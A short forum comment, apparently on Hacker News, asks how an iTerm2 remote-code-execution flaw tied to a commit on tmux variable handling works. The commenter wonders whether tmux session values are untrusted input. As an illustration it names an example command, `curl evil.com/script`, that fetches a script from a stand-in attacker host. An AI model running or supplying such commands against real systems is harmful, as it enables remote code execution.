7 ms·
How does this exploit work? I looked through https://github.com/gnachman/iTerm2/commit/538d570ea54614d3a2b5724f820953d717fbeb0c#diff-be3d2dc8a7d8a4a81bbba890ab
by ji329v089sdjo 7y ago
How does this exploit work?
I looked through https://github.com/gnachman/iTerm2/commit/538d570ea54614d3a2b5724f820953d717fbeb0c#diff-be3d2dc8a7d8a4a81bbba890ab32c9b6R46-R50 https://github.com/gnachman/iTerm2/commit/538d570ea54614d3a2... which appears to do some changing of how tmux variables are hanlded/stored.
Is the vulnerability that tmux session variable names and other session values are untrusted user input?
How does a general command like `curl evil.com/script` turn into an RCE here?